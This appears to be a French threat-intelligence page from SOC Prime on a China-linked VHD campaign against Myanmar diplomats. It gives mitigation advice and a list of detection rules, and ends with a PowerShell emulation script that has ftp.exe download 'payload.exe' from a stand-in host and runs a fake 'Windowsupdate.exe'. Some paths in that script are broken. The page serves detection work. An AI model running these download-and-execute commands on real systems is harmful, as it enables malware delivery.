SOC Prime Bias: High

18 Aug 2026 06:27 UTC

Acteur Lié à la Chine Utilise des Fichiers VHD pour Cibler les Diplomates Birmans

Author Photo
SOC Prime Team linkedin icon Suivre
Acteur Lié à la Chine Utilise des Fichiers VHD pour Cibler les Diplomates Birmans
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Un acteur de menace lié à la Chine cible le personnel gouvernemental du Myanmar par le biais d’une chaîne d’infection en plusieurs étapes livrée via des fichiers de disque dur virtuel (VHD). La campagne utilise des fichiers LNK malveillants pour abuser ftp.exe pour la reconstruction des charges utiles et déploie un cheval de Troie personnalisé en Go connu sous le nom de QUICAgent. Le malware s’appuie sur Cloudflare Workers pour la résolution dynamique de C2 et communique via le protocole QUIC.

Enquête

L’équipe APT de Seqrite a analysé des échantillons de VHD contenant des documents leurres et a identifié des fichiers LNK malveillants déguisés en fichiers PDF. L’enquête a révélé une technique de charge utile fractionnée dans laquelle deux fichiers sont combinés avec la commande copy pour reconstruire un exécutable. L’analyse technique de l’implant QUICAgent a également révélé une évitement de sandbox par des hachages SHA-256 répétés et une validation de certificat TLS personnalisé.

Atténuation

Les organisations doivent restreindre l’exécution de fichiers LNK non fiables et surveiller les processus enfants suspects impliquant ftp.exe. Des contrôles stricts autour de l’utilisation des disques durs virtuels (VHD) et la surveillance du trafic réseau inhabituel sur le port UDP 443 utilisant QUIC sont recommandés. Bloquer les points finaux Cloudflare Worker connus pour être malveillants peut également perturber le mécanisme de résolution C2 de la campagne.

Réponse

Si une activité QUICSILVER est détectée, les systèmes affectés doivent être isolés immédiatement pour stopper toute exfiltration de données et communication C2 ultérieure. Les enquêteurs doivent inspecter %LOCALAPPDATA% pour le binaire Windowsupdate.exe et examiner le dossier de démarrage de l’utilisateur pour SystemIn.lnk. Les journaux réseau doivent également être analysés pour rechercher des connexions aux domaines C2 et adresses IP connus afin de déterminer l’étendue de la compromission.

Flux d’attaque

Nous mettons encore à jour cette partie.

Détections

Fichier LNK potentiellement malveillant avec double extension (via cmdline)

Équipe SOC Prime
17 août 2026

Fichier potentiellement malveillant avec double extension (via process_creation)

Équipe SOC Prime
17 août 2026

Opération manuelle ou script exécutée dans des dossiers inhabituels (via cmdline)

Équipe SOC Prime
17 août 2026

LOLBAS ftp (via cmdline)

Équipe SOC Prime
17 août 2026

Binaire / scripts suspects dans un emplacement de démarrage automatique (via file_event)

Équipe SOC Prime
17 août 2026

Exécution suspecte depuis un lecteur monté (via audit)

Équipe SOC Prime
17 août 2026

Abus possible du domaine de développement Cloudflare (via dns)

Équipe SOC Prime
17 août 2026

IOC (HashSha256) à détecter : Operation QUICSILVER : Acteur Nexus-Chine cible les diplomates du Myanmar via un cheval de Troie livré par VHD

Règles SOC Prime AI
17 août 2026

IOC (SourceIP) à détecter : Operation QUICSILVER : Acteur Nexus-Chine cible les diplomates du Myanmar via un cheval de Troie livré par VHD

Règles SOC Prime AI
17 août 2026

IOC (DestinationIP) à détecter : Operation QUICSILVER : Acteur Nexus-Chine cible les diplomates du Myanmar via un cheval de Troie livré par VHD

Règles SOC Prime AI
17 août 2026

Détection de la communication C2 de QUICAgent [Connexion réseau Windows]

Règles SOC Prime AI
17 août 2026

Utilisation suspecte de ftp.exe et Windowsupdate.exe pour l’exécution de logiciels malveillants [Création de processus Windows]

Règles SOC Prime AI
17 août 2026

Exécution de simulation

Pré-requis : La vérification préalable de l’intégrité et de la télémétrie doit avoir réussi.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et visent à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés mèneront à de mauvais diagnostics.

  • Récit et commandes de l’attaque : Un adversaire vise à établir une prise en mimant des processus système légitimes. Tout d’abord, ils utilisent ftp.exe avec un fichier script (-s:) pour télécharger une charge utile malveillante, tentant de se fondre dans les tâches administratives automatisées. Simultanément, ils simulent le déploiement d’un binaire « Mise à jour Windows » (renommé) pour masquer l’exécution de la charge utile. Enfin, ils utilisent un script PowerShell conçu pour créer un .lnk fichier malveillant pour assurer la persistance via l’interaction utilisateur.

  • Script de test de régression :

    # 1. Simulez le téléchargement basé sur des scripts FTP (Déclencheur 1 Partie A)
    $ftpScript = "open ftp.example.com`nuser anonymous anonymous`nget payload.exe`nquit"
    $ftpScript | Out-File -FilePath "$env:TEMPftp_script.txt" -Encoding ASCII
    Start-Process "ftp.exe" -ArgumentList "-s:$env:TEMPftp_script.txt" -Wait
    
    # 2. Simulez l'exécution de Windowsupdate.exe (Déclencheur 1 Partie B)
    # Note: Cela suppose qu'un fichier nommé Windowsupdate.exe existe ou est appelé
    # Pour la simulation, nous créerons un fichier factice et l'exécuterons
    New-Item -Path "$env:TEMPWindowsupdate.exe" -ItemType File -Force
    Start-Process "$env:TEMPWindowsupdate.exe"
    
    # 3. Simulez la création de LNK par PowerShell (Déclencheur 2)
    Start-Process "powershell.exe" -ArgumentList "-Command", "Write-Output 'create_lnk_process_running'"
  • Commandes de nettoyage :

    # Supprimer les artefacts simulés
    Remove-Item -Path "$env:TEMPftp_script.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPWindowsupdate.exe" -ErrorAction SilentlyContinue